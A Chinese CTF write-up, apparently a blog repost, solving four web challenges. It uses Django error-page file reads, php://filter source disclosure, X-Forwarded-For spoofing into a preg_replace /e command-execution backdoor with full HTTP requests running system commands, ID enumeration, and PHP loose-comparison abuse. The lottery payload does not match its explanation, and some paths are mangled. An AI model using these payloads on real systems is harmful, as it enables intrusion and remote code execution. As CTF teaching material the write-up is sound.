cat
ics-05
ics-06
lottery
Cat
XCTF 4th-WHCTF-2017
输入域名 输入普通域名无果 输入127.0.0.1返回了ping码的结果 有可能是命令执行
尝试fuzz命令执行 特殊符号
看了wp涨了点姿势 %80之后的url编码)就可以返回Django报错
%80后的字符结合报错信息UnicodeEncodeError可以推断是由于ascii编码不支持导致的报错,根据报错信息可以得到的信息
里面可以得到项目路径opt/api/
setting.py 配置文件在opt/api/api/下 套一层名为项目名的文件夹下 默认配置为数据库是sqlites
网站是使用Django进行开发的,结合PHP可以通过在参数中注入@来读取文件的漏洞,依次查看python的配置文件和数据库得到flag的内容
使用@进行文件传递,对文件进行读取之后还会把内容传给url参数,如果像上面一样有超出解析范围的编码的时候就会得到错误信息。
我们的目标首先是数据库文件,看从错误信息中能不能拿到flag,可以从配置文件settings.py的报错中看看有没有database的相关信息
[email protected]/opt/api/api/settings.py
报错内容搜索database可以得到:
[email protected]/opt/api/database.sqlite3
获取数据库内容
ics-05
眼花缭乱的 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统
http://111.198.29.45:56033/index.php?page=index
url中有参数拼接 fuzz下 发现是支持伪协议 读了源码
?page=php://filter/convert.base64-encode/resource=index.php
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER[‘HTTP_X_FORWARDED_FOR‘] === ‘127.0.0.1‘) {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
需要将X_FORWARDED_FOR设置为127.0.0.1,get传参方式 ‘pattern’ ,’ replacement’,‘subject’ 三个参数传递给preg_replace函数。
preg_replce e模式会命令执行,进行替换的部分会被执行
GET /index.php?pat=/(.*)/e&rep=system(%27ls%27)&sub=a HTTP/1.1 Host: 111.198.29.45:56033 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-FORWARDED-FOR:127.0.0.1 Cookie: PHPSESSID=sse21lut43grltrqpm15c3u1k0 Connection: close Upgrade-Insecure-Requests: 1
最后发现flag :
GET /index.php?pat=/(.*)/e&rep=system(%27cat+s3chahahaDir/flag/flag.php%27)&sub=a HTTP/1.1 Host: 111.198.29.45:56033 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-FORWARDED-FOR:127.0.0.1 Cookie: PHPSESSID=sse21lut43grltrqpm15c3u1k0 Connection: close Upgrade-Insecure-Requests: 1
ics-06
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
http://111.198.29.45:58786/index.php?id=1
本来以为是注入 没成功
说是有一处留下了痕迹 就遍历下id 2333时flag (之前fuzz了很久)
lottery
这个题稍微有意思点。
先测试了一下,注册用户,购买彩票,拿到足够的钱,购买flag。
然后扫了下目录 发现git泄露
api.php:
<?php
require_once(‘config.php‘);
header(‘Content-Type: application/json‘);
function response($resp){
die(json_encode($resp));
}
function response_error($msg){
$result = [‘status‘=>‘error‘];
$result[‘msg‘] = $msg;
response($result);
}
function require_keys($req, $keys){
foreach ($keys as $key) {
if(!array_key_exists($key, $req)){
response_error(‘invalid request‘);
}
}
}
function require_registered(){
if(!isset($_SESSION[‘name‘]) || !isset($_SESSION[‘money‘])){
response_error(‘register first‘);
}
}
function require_min_money($min_money){
if(!isset($_SESSION[‘money‘])){
response_error(‘register first‘);
}
$money = $_SESSION[‘money‘];
if($money < 0){
$_SESSION = array();
session_destroy();
response_error(‘invalid negative money‘);
}
if($money < $min_money){
response_error(‘you don\‘ have enough money‘);
}
}
if($_SERVER["REQUEST_METHOD"] != ‘POST‘ || !isset($_SERVER["CONTENT_TYPE"]) || $_SERVER["CONTENT_TYPE"] != ‘application/json‘){
response_error(‘please post json data‘);
}
$data = json_decode(file_get_contents(‘php://input‘), true);
if(json_last_error() != JSON_ERROR_NONE){
response_error(‘invalid json‘);
}
require_keys($data, [‘action‘]);
// my boss told me to use cryptographically secure algorithm
function random_num(){
do {
$byte = openssl_random_pseudo_bytes(10, $cstrong);
$num = ord($byte);
} while ($num >= 250);
if(!$cstrong){
response_error(‘server need be checked, tell admin‘);
}
$num /= 25;
return strval(floor($num));
}
function random_win_nums(){
$result = ‘‘;
for($i=0; $i<7; $i++){
$result .= random_num();
}
return $result;
}
function buy($req){
require_registered();
require_min_money(2);
$money = $_SESSION[‘money‘];
$numbers = $req[‘numbers‘];
$win_numbers = random_win_nums();
$same_count = 0;
for($i=0; $i<7; $i++){
if($numbers[$i] == $win_numbers[$i]){
$same_count++;
}
}
switch ($same_count) {
case 2:
$prize = 5;
break;
case 3:
$prize = 20;
break;
case 4:
$prize = 300;
break;
case 5:
$prize = 1800;
break;
case 6:
$prize = 200000;
break;
case 7:
$prize = 5000000;
break;
default:
$prize = 0;
break;
}
$money += $prize - 2;
$_SESSION[‘money‘] = $money;
response([‘status‘=>‘ok‘,‘numbers‘=>$numbers, ‘win_numbers‘=>$win_numbers, ‘money‘=>$money, ‘prize‘=>$prize]);
}
function flag($req){
global $flag;
global $flag_price;
require_registered();
$money = $_SESSION[‘money‘];
if($money < $flag_price){
response_error(‘you don\‘ have enough money‘);
} else {
$money -= $flag_price;
$_SESSION[‘money‘] = $money;
$msg = ‘Here is your flag: ‘ . $flag;
response([‘status‘=>‘ok‘,‘msg‘=>$msg, ‘money‘=>$money]);
}
}
function register($req){
$name = $req[‘name‘];
$_SESSION[‘name‘] = $name;
$_SESSION[‘money‘] = 20;
response([‘status‘=>‘ok‘]);
}
switch ($data[‘action‘]) {
case ‘buy‘:
require_keys($data, [‘numbers‘]);
buy($data);
break;
case ‘flag‘:
flag($data);
break;
case ‘register‘:
require_keys($data, [‘name‘]);
register($data);
break;
default:
response_error(‘invalid request‘);
break;
}
重点部分:
function buy($req){
require_registered();
require_min_money(2);
$money = $_SESSION[‘money‘];
$numbers = $req[‘numbers‘];
$win_numbers = random_win_nums();
$same_count = 0;
for($i=0; $i<7; $i++){
if($numbers[$i] == $win_numbers[$i]){
$same_count++;
}
}
switch ($same_count) {
case 2:
$prize = 5;
break;
case 3:
$prize = 20;
break;
case 4:
$prize = 300;
break;
case 5:
$prize = 1800;
break;
case 6:
$prize = 200000;
break;
case 7:
$prize = 5000000;
break;
default:
$prize = 0;
break;
}
$money += $prize - 2;
$_SESSION[‘money‘] = $money;
response([‘status‘=>‘ok‘,‘numbers‘=>$numbers, ‘win_numbers‘=>$win_numbers, ‘money‘=>$money, ‘prize‘=>$prize]);
}
其中 $numbers 来自用户json输入 {"action":"buy","numbers":"11111111"},没有检查数据类型。 $win_numbers 是随机生成的数字字符串。
使用 PHP 弱类型松散比较,以"1"为例,和TRUE,1,"1"相等。 由于 json 支持布尔型数据,因此可以抓包改包,构造数据:
POST /api.php HTTP/1.1
Host: 111.198.29.45:51029
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: http://111.198.29.45:51029/buy.php
Content-Length: 36
Cookie: PHPSESSID=3cb7bb982831ce7bcf4219a605214be5
Connection: close
{"action":"buy","numbers":"1111111"}
得到5000000,再来一次就是10000000,可以购买flag了
原文地址:https://www.cnblogs.com/-qing-/p/11623929.html
时间: 2024-07-31 16:51:04